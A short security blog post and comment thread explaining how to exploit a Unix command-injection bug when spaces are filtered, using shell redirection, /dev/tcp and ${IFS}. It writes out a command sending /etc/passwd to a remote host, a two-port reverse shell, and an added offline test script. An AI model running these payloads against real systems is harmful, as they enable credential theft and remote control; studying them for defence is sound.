Thursday, 10 October 2013

[EN] Unix RCE without spaces

You have a Remote Code Execution bug, but spaces are stripped from (or rejected in) your input. How do you pass an argument to a command in that case? And what if you cannot see the output of the command at all? A small trick covers both: redirect standard input and output with < and >, which need no surrounding whitespace.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it over the network!

[host1]
zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060


[host2]
zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

Looks fine ;) The same trick gives you a reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

Now /bin/sh reads its input (the commands) from xxxx.pl:5060 and sends the results to xxxx.pl:2222. On the attacker side that means two listeners, one per port: type commands into the one on 5060 and read output from the one on 2222. Two caveats: the redirections must be interpreted by bash (or another shell with /dev/tcp support, such as ksh), because /dev/tcp is not a device node but a feature of the shell that parses the command line; and only stdout is sent, so if you also want errors, use bash's &> operator in place of > (it redirects both stdout and stderr and needs no space either).

I hope this one was useful ;)
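The following is an added example, not code from the original post, that exercises the same trick offline: a payload filter that rejects any space (standing in for the one the post works around), the no-space file read, the reverse-shell shape with local files in place of the /dev/tcp endpoints so no listener is needed, and the ${IFS} separator raised in the first comment below. The temporary directory, the constructed passwd sample and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: the no-space redirection
# trick exercised locally. Files under a temp dir stand in for the
# /dev/tcp endpoints so nothing here needs a network listener.
set -eu

WORK=$(mktemp -d)                       # assumption: a writable tmp dir
trap 'rm -rf "$WORK"' EXIT
# Constructed sample file standing in for /etc/passwd.
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$WORK/passwd"

# Mimic the filter the post works around: refuse any payload containing
# a space, then hand the survivor to /bin/sh exactly as written.
run_payload() {
    case "$1" in
        *' '*) echo "rejected: payload contains a space" >&2; return 1 ;;
    esac
    sh -c "$1"
}

# 1. cat takes the file on stdin, so no argument (and no space) is needed.
read_without_spaces() {
    run_payload "cat<$1"
}

# 2. The reverse-shell shape: sh reads commands from one path and writes
#    results to another. Under bash, replacing $WORK/cmds and $WORK/out
#    with /dev/tcp/host/port gives the post's
#    sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222.
shell_via_redirection() {
    printf 'cat<%s\n' "$WORK/passwd" > "$WORK/cmds"   # the attacker's command stream
    run_payload "sh<$WORK/cmds>$WORK/out"
    cat "$WORK/out"
}

# 3. Alternative from the comments: ${IFS} expands to whitespace, which is
#    then field-split, so it separates the command from its argument.
ifs_separator() {
    run_payload "cat\${IFS}$1"
}

# Bash-only variants not exercised here: brace expansion {cat,/etc/passwd}
# and &> to send stderr along with stdout.

read_without_spaces "$WORK/passwd"
shell_via_redirection
ifs_separator "$WORK/passwd"
```

Each payload string is checked for spaces before it reaches sh, so the three functions only pass if the trick really works without them; the fourth check in use confirms a plain `cat /etc/passwd` is rejected by the filter.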

27 comments:

  1. Cool note - I've just learned about /dev/tcp recently and I was really surprised to see such a thing, since I've looked at /dev quite often and had never seen it - that of course might be related to the fact that it's not a device, it's a bash feature, huh ;)

    As for spaces, ${IFS} can be used instead (the field separator). I guess there was that old bug with IFS not being cleared in suid binaries calling system("/bin/something"); later on you would switch IFS to / and make a file called bin in the cwd ;) (fixing PATH to point at . as well, of course).

    Cheers

    Replies
    1. Answering after a month - right... ;-) Anyway, thanks for reading. The solution with IFS seems simpler and better than "mine" ;)
